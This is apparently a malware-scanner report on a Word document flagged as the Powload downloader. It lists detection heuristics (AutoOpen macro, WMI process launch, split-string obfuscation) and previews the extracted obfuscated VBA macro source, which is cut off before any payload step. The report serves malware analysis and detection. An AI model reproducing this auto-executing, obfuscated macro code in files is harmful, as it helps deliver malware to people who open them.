MALICIOUS
302
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1218.011 System Binary Proxy Execution: Rundll32
The file contains VBA macros with an AutoOpen function, indicating it attempts to execute code upon opening. Critical heuristics indicate the use of WMI (Win32_Process) to launch processes, a common technique for downloading and executing further malicious content. The ClamAV detection name 'Doc.Downloader.Powload' further supports this. The obfuscation of 'Win32_Process' via string splitting is also noted.
Heuristics 8
-
ClamAV: Doc.Downloader.Powload-6958023-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Powload-6958023-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 44777 bytes |
SHA-256: b365df9524b5e775eaa698288431b9f8b6d9349438009c58128c7ca8710fd669 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "cQAA1Z"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "SQQGZD"
Attribute VB_Base = "0{0A52E058-AE76-4C27-9AF9-3C356DE2D381}{1DC222BD-0E66-44DA-932D-5E1EDD3B3BDE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "K4AGAAG"
Attribute VB_Base = "0{3AE5A0E8-9AF3-409E-8AD7-486B476535BE}{D73F20A7-FE73-4D41-93DC-6D2E05722A3C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "wAwDA_"
Sub autoopen()
If ADDDAUQ = wADAA_4Q Then
ElseIf jAAGA1A = SDABBAZA Then
GABAAAc = (267519638 / 897750405 / sQcAwZ - Cos(756813713 + Tan(EAAAo4)))
ElseIf LQBkZA = pXAAAx Then
cZ4A1AQ = (751133640 / 630216403 / aGABABA - Cos(45757724 + Tan(JD_4AA1A)))
ElseIf DDDDDx = iQAZBCAA Then
ADXcAAD = (135957509 / 149410502 / L_ABG1 - Cos(414211715 + Tan(YADQ_4C)))
End If
If AACAAAAB = NA4QDXZ Then
ElseIf EQ4DAAGA = WcQkGAUw Then
YAU1kAD = (701778413 / 688661393 / Foc1AUA - Cos(296264843 + Tan(tkc1ZZA)))
ElseIf TCcBA1k = TAcAA1AD Then
UAAAAk4G = (400276892 / 985997369 / zAX_4DAA - Cos(16885558 + Tan(sAUZAA)))
ElseIf VUABB_xD = jUAA4wwB Then
LAkAwBAx = (533428355 / 613803216 / jxwDAXD - Cos(5401070 + Tan(tAUAAZ)))
End If
If qXoADAXG = J1oXoAU Then
ElseIf OA_cUUA = UA1QU_B Then
UUAwAAA = (271276750 / 302436636 / vGDZBA - Cos(559905168 + Tan(ZQ_ZUA)))
ElseIf h4AD4A = WAUBBkU Then
dUAQGCA_ = (38677001 / 98134683 / hZG_DAUA - Cos(909608368 + Tan(CDAGAQDD)))
ElseIf ckQDAc = uBA_AAB Then
oZUUA1Q = (23018422 / 696015796 / mCGAUA - Cos(95611544 + Tan(TAADDx)))
End If
wAUZAA
If XoCBQD = YoDXZAA Then
ElseIf dx_XAc = r1xUUABQ Then
MGGQAcA = (601435341 / 716197926 / cA_cDA - Cos(797777708 + Tan(zoUoCA)))
ElseIf EAZAUA = UAoZoB1D Then
cBUAAA = (662716120 / 40666090 / OAADAXQ - Cos(988706587 + Tan(HCA1CxA4)))
ElseIf fA_GZQ = V_ADAA Then
zQBGA1G = (491108569 / 142723745 / GD1kABwA - Cos(245388416 + Tan(iU__Bw)))
End If
If WAAoUAXC = z4AAAB Then
ElseIf OBAUAAX = MZBAAwQA Then
VBZDAkxU = (795838455 / 990537442 / qkQwABU - Cos(102467672 + Tan(V1CA1xA)))
ElseIf lAkDQQQ = HAU1AQG Then
F4CXcwAA = (211428869 / 132033323 / AAAAcUUA - Cos(755302065 + Tan(QACDAkAX)))
ElseIf MQAUQAoA = jGAkGcA Then
zAxGAAA = (32917629 / 159592512 / CCoxQw - Cos(667485931 + Tan(RBUkowG)))
End If
End Sub
Function LoAwGA1A(AQAQcG)
If wAAA4UAk = rBc4cZZG Then
ElseIf GABAAxAA = GcGQAQUA Then
MwAQk_A1 = (569852104 / 893177612 / cABAw4 - Cos(986288814 + Tan(zUQABAXD)))
ElseIf EXwZA_A4 = bQZAA_CC Then
FAAcAZ = (643225345 / 169063010 / zAkkCx - Cos(306331002 + Tan(rAxGUDww)))
ElseIf UwAAkGG1 = UBoAxC Then
UCAAUcD = (180426134 / 100177686 / jA1x_o - Cos(70121657 + Tan(zA1ADcB)))
End If
If qAAQAA = fXQAAxAB Then
ElseIf m4AAAUQc = PQ4cco Then
SAAB4U = (68377651 / 436160027 / uxUQAAx - Cos(844930880 + Tan(WAAA1Q)))
ElseIf iABDAc = YXxxGDAk Then
VAZBCkk = (55184923 / 739573377 / fABUcB - Cos(943206056 + Tan(GUADABB)))
ElseIf CUABUDA = tUwBA_Qo Then
QUQG1Q = (462102489 / 716866647 / fk1UGG - Cos(302115088 + Tan(dZAUkA)))
End If
Set LoAwGA1A = CVar(AQAQcG)
If akoABQBc = GAkAADk Then
ElseIf dABAUoQA = vDU1_UAU Then
iAAAAxB = (89400408 / 203663596 / XADAcGc - Cos(475634290 + Tan(lQXxxA)))
ElseIf FxcZGAAD = TAG4Q1_ Then
d_xDAD = (408372820 / 937147257 / C41AADA - Cos(539471290 + Tan(sAooAk)))
ElseIf FAoQ_AQ = vAUA1A Then
wDAAQQQZ = (408132955 / 451928321 / HAABxBD - Cos(591810695 + Tan(sXwxAZ)))
End If
If uUUZUxZQ = N_AQUAAB Then
ElseIf EDUAA1QA = AwZxAkA Then
kAAUQBQ = (674206449 / 849150678 / uUAAAQcD - Cos(75022217 + Tan(R4
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.